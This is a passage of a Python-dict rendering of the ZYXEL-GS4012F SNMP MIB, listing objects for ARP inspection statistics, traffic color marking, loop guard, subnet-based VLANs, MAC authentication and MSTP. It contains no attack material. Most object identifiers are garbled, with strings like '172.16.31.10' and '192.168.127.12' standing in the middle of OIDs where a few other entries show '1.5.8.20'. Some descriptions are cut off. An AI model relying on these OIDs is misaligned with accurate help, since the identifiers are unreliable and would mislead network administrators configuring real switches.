],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogNumPkt" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "DateAndTime"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectStatisticsEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1",
"status" : "current",
"linkage" : [
"arpInspectStatisticsVid",
],
"description" :
"""""",
}, # row
"arpInspectStatisticsVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsReceived" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.2",
"status" : "current",
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsRequest" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.3",
"status" : "current",
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsReply" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.4",
"status" : "current",
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsForward" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.5",
"status" : "current",
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsDrop" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.6",
"status" : "current",
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsClear" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"trTCMSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103",
}, # node
"trTCMState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.103.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Two-rate three color marker enabled/disabled for the switch.""",
}, # scalar
"trTCMMode" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.103.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"color-aware" : {
"nodetype" : "namednumber",
"number" : "0"
},
"color-blind" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"trTCMPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3",
"status" : "current",
"description" :
"""""",
}, # table
"trTCMPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1",
"create" : "true",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in trTCMPortTable.""",
}, # row
"trTCMPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""Two-rate three color marker enabled/disabled on the port.""",
}, # column
"trTCMPortCIR" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Allowed CIR in pkts/s.""",
}, # column
"trTCMPortPIR" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Allowed PIR in pkts/s.""",
}, # column
"trTCMPortDscpGreen" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0-63""",
}, # column
"trTCMPortDscpYellow" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0-63""",
}, # column
"trTCMPortDscpRed" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.103.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0-63""",
}, # column
"loopGuardSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.104",
}, # node
"loopGuardState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.104.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"loopGuardPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.104.2",
"status" : "current",
"description" :
"""""",
}, # table
"loopGuardPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.104.2.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in loopGuardPortTable.""",
}, # row
"loopGuardPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.104.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"subnetBasedVlanSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105",
}, # node
"subnetBasedVlanState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""subnet-based vlan feature enabled/disabled for the switch.""",
}, # scalar
"dhcpVlanOverrideState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""dhcp vlan override enabled/disabled when subnet-based vlan is enabled.""",
}, # scalar
"subnetBasedVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3",
"status" : "current",
"description" :
"""""",
}, # table
"subnetBasedVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1",
"create" : "true",
"status" : "current",
"linkage" : [
"subnetBasedVlanSrcIp",
"subnetBasedVlanSrcMaskBit",
],
"description" :
"""An entry in subnetBasedVlanTable.""",
}, # row
"subnetBasedVlanSrcIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""source ip for subnet-based vlan entry""",
}, # column
"subnetBasedVlanSrcMaskBit" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "32"
},
],
"range" : {
"min" : "1",
"max" : "32"
},
},
},
"access" : "readonly",
"description" :
"""source ip mask-bits for subnet-based vlan entry""",
}, # column
"subnetBasedVlanName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"parent module" : {
"name" : "RFC1213-MIB",
"type" : "DisplayString",
},
"ranges" : [
{
"min" : "0",
"max" : "31"
},
],
"range" : {
"min" : "0",
"max" : "31"
},
},
},
"access" : "readwrite",
"description" :
"""name for subnet-based vlan entry""",
}, # column
"subnetBasedVlanVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readwrite",
"description" :
"""vid for subnet-based vlan entry""",
}, # column
"subnetBasedVlanPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.105.3.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "7"
},
],
"range" : {
"min" : "0",
"max" : "7"
},
},
},
"access" : "readwrite",
"description" :
"""priority for subnet-based vlan entry""",
}, # column
"subnetBasedVlanEntryState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.105.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"macAuthenticationSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106",
}, # node
"macAuthenticationState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"macAuthenticationNamePrefix" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"macAuthenticationPassword" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"macAuthenticationTimeout" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"macAuthenticationPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.5",
"status" : "current",
"description" :
"""""",
}, # table
"macAuthenticationPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.5.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in macAuthenticationPortTable.""",
}, # row
"macAuthenticationPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.106.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mstp" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107",
}, # node
"mstpGen" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1",
}, # node
"mstpGenState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Enabled/disabled on the mrstp bridge.""",
}, # scalar
"mstpGenCfgIdName" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""The configuration name that identifies the MST
region and is used as one of the inputs in the
computation of the MST Configuration Identifier.""",
"reference>" :
"""12.12.3.4.2.b)""",
}, # scalar
"mstpGenCfgIdRevLevel" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""This object identifies the MST revision that
identifies the MST region and is used as one
of the inputs in the computation of the MST
configuration Identifier.""",
"reference>" :
"""12.12.3.4.2.c)""",
}, # scalar
"mstpGenCfgIdCfgDigest" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "16",
"max" : "16"
},
],
"range" : {
"min" : "16",
"max" : "16"
},
},
},
"access" : "readonly",
"description" :
"""Configuration Digest.""",
"reference>" :
"""12.12.3.3.3.a.4""",
}, # scalar
"mstpGenHelloTime" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "1",
"max" : "10"
},
],
"range" : {
"min" : "1",
"max" : "10"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mstpGenMaxAge" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.6",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "6",
"max" : "40"
},
],
"range" : {
"min" : "6",
"max" : "40"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mstpGenForwardDelay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.7",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"parent module" : {
"name" : "BRIDGE-MIB",
"type" : "Timeout",
},
"ranges" : [
{
"min" : "4",
"max" : "30"
},
],
"range" : {
"min" : "4",
"max" : "30"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mstpGenMaxHops" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.8",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "4",
"max" : "30"
},
],
"range" : {
"min" : "4",
"max" : "30"
},
},
},
"access" : "readwrite",
"description" :
"""13.22.f)""",
}, # scalar
"mstpGenCistRootPathCost" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
""".""",
}, # scalar
"mstpGenCistRootBrid" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.1.10",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "32",
"max" : "32"
},
],
"range" : {
"min" : "32",
"max" : "32"
},
},
},
"access" : "readonly",
"description" :
""".""",
}, # scalar
"mstMapTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20",
"status" : "current",
"description" :
"""This table contains one entry for each instance of MSTP.""",
}, # table
"mstMapEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1",
"create" : "true",
"status" : "current",
"linkage" : [
"mstMapIndex",
],
"description" :
"""A conceptual row containing the status of the MSTP instance.""",
}, # row
"mstMapIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "MstiOrCistInstanceIndex"},
},
"access" : "noaccess",
"description" :
"""Uniquely identifies an instance. The entry of this table with index 0
presents always, represents CIST. When SET operation """,
}, # column
"mstMapVlans1k" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "0",
"max" : "128"
},
],
"range" : {
"min" : "0",
"max" : "128"
},
},
},
"access" : "readwrite",
"description" :
"""A string of octets containing one bit per VLAN. The
first octet corresponds to VLANs with VlanIndex values
1 through 8; the second octet to VLANs 9 through
16 etc. The most significant bit of each octet
corresponds to the lowest VlanIndex value in that octet.
For each VLAN that is mapped to this MSTP instance,
the bit corresponding to that VLAN is set to '1'.
Empty (zero) most significant octes are not mandatory.""",
}, # column
"mstMapVlans2k" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "0",
"max" : "128"
},
],
"range" : {
"min" : "0",
"max" : "128"
},
},
},
"access" : "readwrite",
"description" :
"""A string of octets containing one bit per VLAN for
VLANS with VlanIndex values 1024 through 2047. The
first octet corresponds to VLANs with VlanIndex values
1024 through 1031; the second octet to VLANs 1032
through 1039 etc. The most significant bit of each
octet corresponds to the lowest VlanIndex value in that
octet.
For each VLAN that is mapped to this MSTP instance,
the bit corresponding to that VLAN is set to '1'.
Empty (zero) most significant octes are not mandatory.""",
}, # column
"mstMapVlans3k" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "0",
"max" : "128"
},
],
"range" : {
"min" : "0",
"max" : "128"
},
},
},
"access" : "readwrite",
"description" :
"""A string of octets containing one bit per VLAN for
VLANS with VlanIndex values 2048 through 3071. The
first octet corresponds to VLANs with VlanIndex values
of 2048 through 2055; the second octet to VLANs 2056
through 2063 etc. The most significant bit of each
octet corresponds to the lowest VlanIndex value in that
octet.
For each VLAN that is mapped to this MSTP instance,
the bit corresponding to that VLAN is set to '1'.
Empty (zero) most significant octes are not mandatory.""",
}, # column
"mstMapVlans4k" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "0",
"max" : "128"
},
],
"range" : {
"min" : "0",
"max" : "128"
},
},
},
"access" : "readwrite",
"description" :
"""A string of octets containing one bit per VLAN for
VLANS with VlanIndex values 3072 through 4095. The
first octet corresponds to VLANs with VlanIndex values
3072 through 3079; the second octet to VLANs 3080
through 3087 etc. The most significant bit of each
octet corresponds to the lowest VlanIndex value in that
octet.
For each VLAN that is mapped to this MSTP instance,
the bit corresponding to that VLAN is set to '1'.
Empty (zero) most significant octes are not mandatory.""",
}, # column
"mstMapRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.20.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mstVlanTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.30",
"status" : "current",
"description" :
"""This table contains one entry for each VlanId.""",
}, # table
"mstVlanEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.30.1",
"status" : "current",
"linkage" : [
"mstVlanIndex",
],
"description" :
"""Information regarding the instance to which each Vlan is mapped.""",
}, # row
"mstVlanIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.30.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "noaccess",
"description" :
"""The VlanId for which this entry contains the instance mapped.""",
}, # column
"mstVlanMstIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.30.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "MstiOrCistInstanceIndex"},
},
"access" : "readonly",
"description" :
"""An integer with values ranging from 0 to 64 that identify a
the CIST/MSTI instance to which this VLAN is mapped""",
}, # column
"mstpPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.40",
"status" : "current",
"description" :
"""A table that contains generic information about
every port that is associated with this bridge.""",
}, # table
"mstpPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.40.1",
"status" : "current",
"linkage" : [
"mstpPortIndex",
],
"description" :
"""A list of information for each port of the
bridge.""",
}, # row
"mstpPortIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.10172.16.58.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "65535"
},
],
"range" : {
"min" : "1",
"max" : "65535"
},
},
},
"access" : "noaccess",
"description" :
"""A unique value, greater than zero, for each Port.
The value for each interface sub-layer
must remain constant at least from one re-initialization
of the entity's network management system to the next re-
initialization.""",
}, # column
"mstpPortOperEdgePort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.40.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "TruthValue"},
},
"access" : "readonly",
"description" :
"""""",
"reference>" :
"""""",
}, # column
"mstpPortOperPointToPointMAC" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.40.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "TruthValue"},
},
"access" : "readonly",
"description" :
"""""",
"reference>" :
"""""",
}, # column
"mstpXstTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50",
"status" : "current",
"description" :
""".""",
}, # table
"mstpXstEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1",
"status" : "current",
"linkage" : [
"mstpXstId",
],
"description" :
""".""",
}, # row
"mstpXstId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "MstiOrCistInstanceIndex"},
},
"access" : "readonly",
"description" :
"""0 means CIST.""",
}, # column
"mstpXstBridgePriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "61440"
},
],
"range" : {
"min" : "0",
"max" : "61440"
},
},
},
"access" : "readwrite",
"default" : "32768",
"description" :
"""Bridge priority, in steps of 4096.""",
}, # column
"mstpXstBridgeId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.192.168.127.12",
"status" : "current",
"syntax" : {
"type" : { "module" :"BRIDGE-MIB", "name" : "BridgeId"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstInternalRootCost" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.192.168.3.11",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstRootPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.107.50.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
""".""",
}, # column
"mstpXstTimeSinceTopologyChange" : {
"nodetype" : "column",
